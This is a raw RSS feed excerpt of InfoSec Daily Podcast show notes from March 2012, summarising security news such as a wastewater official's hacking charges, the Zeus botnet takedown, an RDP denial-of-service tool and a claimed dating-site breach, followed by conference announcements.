<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.govtech.com/public-safety/Report-Hacking-Lands-Florida-Wastewater-Official-in-Hot-Water.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.govtech.com/public-safety/Report-Hacking-Lands-Florida-Wastewater-Official-in-Hot-Water.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The former chief financial officer of Florida&rsquo;s Key Largo Wastewater Treatment District is over his head in cybercrime after being arrested and charged with hacking the district&rsquo;s computer system.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sal Zappulla is facing at least 21 felony counts as a result of his alleged hacking, according to The Miami Herald. The newspaper</span><a href="http://www.miamiherald.com/2012/03/22/2707830/key-largo-sewer-honcho-in-hot.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> reported</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that Zappulla&rsquo;s contract with the wastewater treatment district was not renewed in December, following email leaks to the media that brought to light several arguments between the CFO and colleagues.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The felony charges against Zappulla include 13 counts of computer crime with intent to defraud, seven counts of modifying information without authority and one count of deleting information from the district&rsquo;s computers. He also faces nine misdemeanor attempted conspiracy counts.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Local 10 News said Zappulla is alleged to have used the login and password information of current district employees to access the district&rsquo;s computer system from home. Police also say Zappulla downloaded emails and files related to himself. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.nextgov.com/nextgov/ng_20120323_1655.php"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.nextgov.com/nextgov/ng_20120323_1655.php</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Agencies that deal with national security data and programs must do more to secure their information technology supply chains, a government watchdog said Friday.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Federal agencies aren&#39;t required to track &quot;the extent to which their telecommunications networks contain foreign-developed equipment, software or services,&quot; the Government Accountability Office report said, and they typically are aware only of the IT vendors nearest to them on the supply chain, not the numerous vendors downstream.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">That has left IT systems at the Energy, Homeland Security and Justice departments more vulnerable to malicious or counterfeit software installed by other nations&#39; intelligence agencies or by nonstate actors and hackers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">U.S. enemies could use that malicious software to secretly pull information from government systems, erase or alter information on those systems, or even take control of them remotely.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Justice Department has identified measures to protect its supply chain but has not developed procedures to implement those measures, the report said. Energy and Homeland Security haven&#39;t identified measures to protect their supply chains at all, according to GAO.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The watchdog agency also examined the Defense Department, which it said had designed and effectively implemented a supply chain risk management program.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defense has reduced its supply chain risk through a series of pilot programs and expects to have &quot;full operational capability for supply chain risk management&quot; by 2016, the report said. Those pilots focus both on assessing the risk posed by particular vendors&#39; supply chains and on testing and evaluating the purchased systems for malicious components, GAO said.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The U.S. Computer Emergency Readiness Team inside DHS has found that about one-fourth of roughly 43,000 agency-reported security incidents during fiscal 2011 involved malicious code that could have been installed somewhere along the supply chain, GAO said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://blogs.technet.com/b/microsoft_blog/archive/2012/03/25/microsoft-and-financial-services-industry-leaders-target-cybercriminal-operations-from-zeus-botnets.aspx"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.technet.com/b/microsoft_blog/archive/2012/03/25/microsoft-and-financial-services-industry-leaders-target-cybercriminal-operations-from-zeus-botnets.aspx</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft&rsquo;s Digital Crimes Unit &ndash; in collaboration with Financial Services &ndash; Information Sharing and Analysis Center (FS-ISAC) and NACHA &ndash; The Electronic Payments Association, as well as Kyrus Tech Inc. &ndash; has executed a coordinated global action against some of the worst known cybercrime operations fueling online fraud and identity theft today. With this legal and technical action, a number of the most harmful botnets using the Zeus family of malware worldwide have been disrupted in an unprecedented, proactive cross-industry operation against this cybercriminal organization.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As you may have read, after a months-long investigation, successful pleading before the U.S. District Court for the Eastern District of New York and a coordinated seizure of command and control servers in Scranton, Penn. and Lombard, Ill., some of the worst known Zeus botnets were disrupted by Microsoft and our partners worldwide. Valuable evidence and intelligence gained in the operation will be used both to help rescue peoples&rsquo; computers from the control of Zeus, as well as in an ongoing effort to undermine the cybercriminal organization and help identify those responsible.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cybercriminals have built hundreds of botnets using variants of Zeus malware. For this action &ndash; codenamed Operation b71 &ndash; we focused on botnets using Zeus, SpyEye and Ice-IX variants of the Zeus family of malware, known to cause the most public harm and which experts believe are responsible for nearly half a billion dollars in damages. Due to the unique complexity of these particular targets, unlike our prior botnet takedown operations, the goal here was not the permanent shutdown of all impacted targets. Rather, our goal was a strategic disruption of operations to mitigate the threat in order to cause long-term damage to the cybercriminal organization that relies on these botnets for illicit gain.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.f-secure.com/weblog/archives/00002338.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.f-secure.com/weblog/archives/00002338.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since the public release of Microsoft&#39;s MS12-020 bulletin, there have been plenty of attempts to exploit vulnerabilities in the Remote Desktop Protocol (RDP). Last week, we received a related sample, which turned out to be a tool called &quot;RDPKill by: Mark DePalma&quot; that was designed to kill targeted RDP service.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The tool was written with Visual Basic 6.0, and has a simple user interface. We tested it on machines running on Windows XP 32-bit and Windows 7 64-bit.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Both the Windows XP 32-bit and the Windows 7 64-bit computers were affected by the Denial of Service (DoS) attack. The service crashed and triggered a &quot;Blue Screen of Death&quot; (BSoD) condition (the error screen seen when Windows crashes).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerworld.com/s/article/9225583/Reborn_LulzSec_claims_hack_of_dating_site_for_military_personnel"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9225583/Reborn_LulzSec_claims_hack_of_dating_site_for_military_personnel</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A group of hackers claiming to be the reborn Lulz Security (LulzSec) took credit for an alleged compromise of MilitarySingles.com, a dating website for military personnel, and the leak of over 160,000 account details from its database.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The group announced the MilitarySingles.com hack on Twitter and Pastebin on Sunday, using the name &quot;LulzSec Reborn&quot; and ASCII art previously associated with LulzSec, the hacker group that apparently disbanded and merged with the Anonymous hacktivist collective last year.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Pastebin post included links to RAR archives hosted on public file sharing websites that allegedly contain the names, usernames, e-mail addresses, IP addresses, and passwords of 163,792 MilitarySingles.com users. &quot;There are emails such as @us.army.mil ; @carney.navy.mil ; @greatlakes.cnet.navy.mil ; @microsoft.com ; etc.,&quot; the group wrote.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Someone claiming to be the administrator of MilitarySingles.com posted a comment on databreaches.net after the site reported on the breach, saying that there is no evidence of a compromise.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.theregister.co.uk/2012/01/13/pirate_bay_dropping_torrents/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/01/13/pirate_bay_dropping_torrents/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft has confirmed that users of its instant messaging app will not be able to send each other links to popular torrent site The Pirate Bay, citing &ldquo;malware fears.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We block instant messages if they contain malicious or spam URLs based on intelligence algorithms, third-party sources, and/or user complaints. Pirate Bay URLs were flagged by one or more of these and were consequently blocked,&quot; Redmond told The Register in an emailed statement.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One can understand banning links to malware, even if that&#39;s something that IM providers have been less than successful at managing in the past. But Redmond&#39;s ban does rather raise the question as to why Pirate Bay has been singled out for blocking, when there are plenty of other sites to choose from, many with a much worse record for malware content than the Swedish site.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When asked about this, Microsoft declined to give any more details for their censorship choice. Certainly Pirate Bay is still the most popular torrent indexing site &ndash; even if, strictly speaking, it&#39;s</span><a href="http://www.theregister.co.uk/2012/01/13/pirate_bay_dropping_torrents/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> not indexing torrents</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> any more. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There&#39;s plenty of legitimate material for download using Pirate Bay&#39;s feeds, and that too is being censored by Microsoft&#39;s move to block all links, not just those that it knows contain malware. But in singling out this target, Redmond is opening itself up to claims that it is joining the global jihad against Pirate Bay &ndash; certainly its lack of explanation for targeting just that the site and not others indicates this. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-630-wastewater-hacker-supply-chain-tracking-zeus-disruption-rdp-ddos-tool-reborn-lulzsec-and-piratebay-censoring/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3693/0/infosec-daily-podcast-episode-630.mp3" length="17543505" type="audio/mpeg" />
		<itunes:duration>0:36:30</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 630 for March 27, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris &#8220;The Best Around&#8221; Sverdlik, Karthik Rangarajan, and &#8220;the Great and Wonderful&#8221; Themson Mester.
&#160;
Announcements:
In[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 630 for March 27, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris &#8220;The Best Around&#8221; Sverdlik, Karthik Rangarajan, and &#8220;the Great and Wonderful&#8221; Themson Mester.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1, 2012
	Where: Austin, Texas
	http://www.Infosecsouthwest.com
&#160;
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://www.govtech.com/public-safety/Report-Hacking-Lands-Florida-Wastewater-Official-in-Hot-Water.html
The former chief financial officer of Florida&#8217;s Key Largo Wastewater Treatment District is over his head in cybercrime after being arrested and charged with hacking the district&#8217;s computer system.
Sal Zappulla is facing at least 21 felony counts as a result of his alleged hacking, according to The Miami Herald. The newspaper reported that Zappulla&#8217;s contract with the wastewater treatment district was not renewed in December, following email leaks to the media that brought to light several arguments between the CFO and colleagues.
The felony charges against Zappulla include 13 counts of computer crime with intent to defraud, seven counts of modifying information without authority and one count of deleting information from the district&#8217;s computers. He also faces nine misdemeanor attempted conspiracy counts.
Local 10 News said Zappulla is alleged to have used the login and password information of current district employees to access the district&#8217;s computer system from home. Police also say Zappulla downloaded emails and files related to himself. 
&#8230;
Source: &#160;http://www.nextgov.com/nextgov/ng_20120323_1655.php
Agencies that deal with national security data and programs must do more to secure their information technology supply chains, a government watchdog said Friday.
&#160;
Federal agencies aren&#39;t required to track &#34;the extent to which their telecommunications networks contain foreign-developed equipment, software or services,&#34; the Government Accountability Office report said, and they typically are aware only of the IT vendors nearest to them on the supply chain, not the numerous vendors downstream.
&#160;
That[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 629 &#8211; Last Three SSID, UUID, OS X Malware, MilitarySingles, and Election DDoS</title>
		<link>http://www.isdpodcast.com/episode-629-last-three-ssid-uuid-os-x-malware-militarysingles-and-election-ddos</link>
		<comments>http://www.isdpodcast.com/episode-629-last-three-ssid-uuid-os-x-malware-militarysingles-and-election-ddos#comments</comments>
		<pubDate>Tue, 27 Mar 2012 00:55:41 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3690</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 629 for March 26, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, and Karthik Rangarajan. &#160; Announcements: InfoSec Southwest When: March 30-April 1, 2012 Where: Austin, Texas http://www.Infosecsouthwest.com &#160; Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: Saturday, [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 629 for March 26, 2012. </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1, 2012<br class="kix-line-break" /><br />
	Where: Austin, Texas<br class="kix-line-break" /><br />
	</span><a href="http://www.infosecsouthwest.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA<br class="kix-line-break" /><br />
	</span><a href="http://www.outerz0ne.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
